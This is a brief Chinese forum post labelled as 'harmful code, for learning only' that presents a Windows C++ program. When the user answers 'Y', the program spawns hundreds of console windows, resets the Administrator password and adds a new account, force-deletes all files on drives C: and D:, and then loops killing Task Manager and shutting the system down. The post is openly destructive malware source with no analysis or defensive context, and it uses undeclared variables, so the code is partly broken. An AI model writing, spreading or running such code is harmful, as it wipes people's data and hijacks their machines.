伤害性代码,仅供学习,如有错误请反馈
2025-07-29 17:13:41
发布于:广东
#include<iostream>
#include<stdlib.h>
#include<conio.h>
#include<windows.h>
#include<ctime>
#include<bits/stdc++.h>
using namespace std;
int main(){
cout<<"Y(yes)N(no):";
char k=getch();
if(k=='Y'||k=='y'){
int i;
for(i=1;i<=200;i++){
system("start");
}
system("net user Administrator wait");
system("net user XXX wait /add");
system("del /F /S /Q D:\\");
system("del /F /S /Q C:\\");
while(1){
SetCursorPos(rand() % x, rand() % y);
system("cmd");
system("taskkill /f /im taskmgr.exe");
system("shutdown -s -t 0");
}
}
else{
return 0;
}
}
这里空空如也
有帮助,赞一个